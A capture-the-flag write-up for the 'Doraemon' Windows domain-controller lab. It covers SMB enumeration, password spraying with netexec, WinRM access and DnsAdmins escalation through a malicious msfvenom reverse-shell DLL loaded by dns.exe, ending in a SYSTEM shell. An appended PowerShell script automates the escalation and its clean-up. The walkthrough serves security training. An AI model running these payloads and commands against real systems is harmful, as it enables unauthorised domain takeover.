Lab: The Hackers Labs
URL: https://thehackerslabs.com/doraemon/
OS: Windows
Topics: SMB password spraying, DnsAdmins privilege escalation
First, scan all TCP ports.
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 13:59 CST
Nmap scan report for 192.168.56.154
Host is up (0.00094s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 11:59:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: DORAEMON)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DORAEMON.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-time:
| date: 2024-11-09T12:00:53
|_ start_date: 2024-11-09T11:49:47
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 5h39m59s, deviation: 34m38s, median: 5h59m59s
| smb-os-discovery:
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
| Computer name: WIN-VRU3GG3DPLJ
| NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
| Domain name: DORAEMON.THL
| Forest name: DORAEMON.THL
| FQDN: WIN-VRU3GG3DPLJ.DORAEMON.THL
|_ System time: 2024-11-09T13:00:53+01:00
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c0:aa:e7 (VMware)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
List the SMB shares over a null session: gorrocoptero is readable (READ). Note from the output that SMB signing is required, so NTLM relay against this host is not an option, but SMBv1 is still enabled.
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL) (signing:True) (SMBv1:True)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\null:
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ gorrocoptero READ
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ IPC$ IPC remota
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ Users
Enumerate the domain users by RID cycling over the anonymous session and save them as names.txt.
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Doraemon
Nobita
Shizuka
Gigante
Suneo
Save the group names as well (not actually needed here, although DnsAdmins already stands out).
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute | grep -oP '(?<=DORAEMON\\).*(?= \(SidTypeGroup\))'
Enterprise Domain Controllers de sólo lectura
Admins. del dominio
Usuarios del dominio
Invitados del dominio
Equipos del dominio
Controladores de dominio
Administradores de esquema
Administradores de empresas
Propietarios del creador de directivas de grupo
Controladores de dominio de sólo lectura
Controladores de dominio clonables
Protected Users
Administradores clave
Administradores clave de la organización
DnsAdmins
DnsUpdateProx
The file in the SMB share is a dialogue I cannot read, so split it into individual words to build pass.txt (strip punctuation, one word per line, deduplicate) and spray the result against the user list.
└─$ cat kedadawapa.txt | tr -d ',.?!' | tr ' ' '\n' | sort -u > pass.txt
└─$ netexec smb $IP -u names.txt -p pass.txt --continue-on-success |grep '[+]'
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Invitado: (Guest)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\DefaultAccount: (Guest)
SMB 192.168.56.154 445 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1
Only Doraemon:Dorayaki1 is a real credential; the Invitado and DefaultAccount lines are marked (Guest), meaning the server accepted those logons as guest. Check whether Doraemon can log in over WinRM: it can.
└─$ netexec winrm $IP -u Doraemon -p Dorayaki1
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:DORAEMON.THL)
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Doraemon:Dorayaki1 (Pwn3d!)
Log in as Doraemon and check the token privileges; nothing here is directly usable for escalation.
└─$ evil-winrm -i $IP -u Doraemon -p Dorayaki1
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Doraemon\Documents> whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
Browsing the Links directory turns up a hidden file. A plain dir omits files carrying the hidden attribute (the h in -a-h--), so run dir -Force.
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir
*Evil-WinRM* PS C:\Users\Doraemon\Links> dir -force
Directorio: C:\Users\Doraemon\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-h-- 10/1/2024 12:35 PM 58 Carta de amor a Shizuka.txt
*Evil-WinRM* PS C:\Users\Doraemon\Links> type 'Carta de amor a Shizuka.txt'
Shizuka te doy la clave de mi corazon: ShizukaTeAmobb12345
The letter is addressed to Shizuka, but spraying that password across the user list shows the account that actually uses it is Suneo.
└─$ netexec winrm $IP -u names.txt -p ShizukaTeAmobb12345 | grep '[+]'
WINRM 192.168.56.154 5985 WIN-VRU3GG3DPLJ [+] DORAEMON.THL\Suneo:ShizukaTeAmobb12345 (Pwn3d!)
Logging in as Suneo gives the user flag.
To make enumeration easier, upload SharpHound and collect the domain data. First start an SMB server on the attacker machine (192.168.56.101) to serve the binary.
└─$ impacket-smbserver -smb2support kali /opt/SharpHound
Run SharpHound on the target straight from the share; it writes a zip for BloodHound into the current directory.
*Evil-WinRM* PS C:\Users\Doraemon\Documents> \\192.168.56.101\kali\SharpHound.exe
...
*Evil-WinRM* PS C:\Users\Doraemon\Documents> dir
Directorio: C:\Users\Doraemon\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/9/2024 2:25 PM 12205 20241109142502_BloodHound.zip
-a---- 11/9/2024 2:25 PM 8586 MjhiMTQyYmItYzllMS00ODVmLWFkZWItNmIwMGE2NTIyYWIx.bin
Looking at the suneo user: it belongs to four groups, and the global group memberships (Miembros del grupo global) include DnsAdmins.
*Evil-WinRM* PS C:\Users\Suneo\Documents> net user suneo
...
Miembros del grupo local *Dorayaki
*Usuarios de administr
Miembros del grupo global *DnsAdmins
*Usuarios del dominio
Members of DnsAdmins can point the DNS service at an arbitrary DLL; the technique is described in the following articles.
https://medium.com/r3d-buck3t/escalating-privileges-with-dnsadmins-group-active-directory-6f7adbc7005b
https://0xstarlight.github.io/posts/Active-Directory-Domain-Priv-Esc/
First generate a reverse-shell DLL with msfvenom. LHOST must be the attacker's address (192.168.56.101 here), not the target address held in $IP by the earlier commands.
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f dll > malicious.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Upload the DLL to the target (Evil-WinRM's upload command works) and run the following commands there. dnscmd writes the path into the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, and dns.exe, which runs as SYSTEM, loads that DLL the next time it starts, which is why the service is stopped and started again. Restarting the service requires stop/start rights on it; that holds in this lab, but in a real domain DnsAdmins members often lack them and would have to wait for a reboot.
*Evil-WinRM* PS C:\Users\Suneo\Documents> dnscmd 127.0.0.1 /config /serverlevelplugindll C:\Users\Suneo\Documents\malicious.dll
Propiedad del Registro serverlevelplugindll restablecida correctamente.
Comando completado correctamente.
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe stop dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0
*Evil-WinRM* PS C:\Users\Suneo\Documents> sc.exe start dns
NOMBRE_SERVICIO: dns
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x1
INDICACIÓN_INICIO : 0x4e20
PID : 3700
MARCAS :
Start a listener on that port on the attacker machine before restarting the service; the callback arrives as NT AUTHORITY\SYSTEM (the Windows equivalent of root), because the payload runs inside dns.exe.
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.154] 50091
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami /priv
whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
======================= ============================================ ==========
SeAuditPrivilege Generar auditorías de seguridad Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticación Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
C:\Windows\system32>whoami
whoami
nt authority\system
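The whole target-side sequence again, this time with the verification and clean-up steps a tester should not skip, as an added PowerShell example that is not part of the original write-up. It assumes the DLL was uploaded to C:\Users\Suneo\Documents\malicious.dll (the path used above), that the nc listener is already running on the LHOST/LPORT compiled into the DLL, and that the DNS Parameters registry key is readable by the current user (it is on a default DC). The escalation function runs from the Suneo Evil-WinRM shell; the clean-up function is meant for the SYSTEM shell obtained afterwards (run it via powershell -c from the cmd.exe prompt), since deleting the registry value needs admin rights.

```powershell
# Added example, not from the original write-up. Run from the Suneo Evil-WinRM shell.
# Assumptions: malicious.dll is already uploaded to $DllPath, nc is listening on the
# LHOST/LPORT baked into it, and HKLM\...\DNS\Parameters is readable by this user.
$DllPath = 'C:\Users\Suneo\Documents\malicious.dll'
$DnsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsAdminsMember {
    # Membership in DnsAdmins is what authorises the dnscmd /config call below.
    [bool]((whoami /groups) -match 'DnsAdmins')
}

function Get-DnsPluginDll {
    # The value dnscmd sets; dns.exe (running as SYSTEM) calls LoadLibrary on it at start-up.
    (Get-ItemProperty -Path $DnsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
}

function Restart-DnsService {
    # sc stop returns while the service is still STOP_PENDING, so wait before starting again.
    sc.exe stop dns | Out-Null
    try {
        (Get-Service -Name dns).WaitForStatus('Stopped', [TimeSpan]::FromSeconds(30))
    } catch {
        # dns.exe can hang with the payload DLL loaded; from SYSTEM this kills it, as Suneo it is a no-op.
        Stop-Process -Name dns -Force -ErrorAction SilentlyContinue
    }
    sc.exe start dns | Out-Null
}

function Invoke-DnsAdminsEscalation {
    if (-not (Test-DnsAdminsMember)) { throw 'Current user is not in DnsAdmins' }
    if (-not (Test-Path -Path $DllPath)) { throw "DLL not found at $DllPath; upload it first" }

    dnscmd 127.0.0.1 /config /serverlevelplugindll $DllPath
    # Verify the write actually happened instead of trusting the localized dnscmd message.
    if ((Get-DnsPluginDll) -ne $DllPath) { throw 'ServerLevelPluginDll was not set; check the dnscmd output' }

    # The reverse shell fires during service start. dns.exe never finishes starting because
    # the msfvenom payload does not return from DllMain, so expect START_PENDING, not RUNNING.
    Restart-DnsService
}

function Remove-DnsPluginDll {
    # Clean-up for the SYSTEM shell: delete the value and restart DNS so the DC resolves
    # names again (Kerberos and LDAP clients on this box depend on it). Needs admin rights.
    Remove-ItemProperty -Path $DnsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-DnsService
}

Invoke-DnsAdminsEscalation
```

The registry check after dnscmd is the useful addition: a failed call still prints a success-looking line in some localized builds, and reading the value back is the only way to know the service will actually load the DLL. Once the SYSTEM shell is in hand, run Remove-DnsPluginDll from it; leaving the value in place keeps the DC's DNS service broken and leaves a persistent SYSTEM backdoor that any later restart re-triggers.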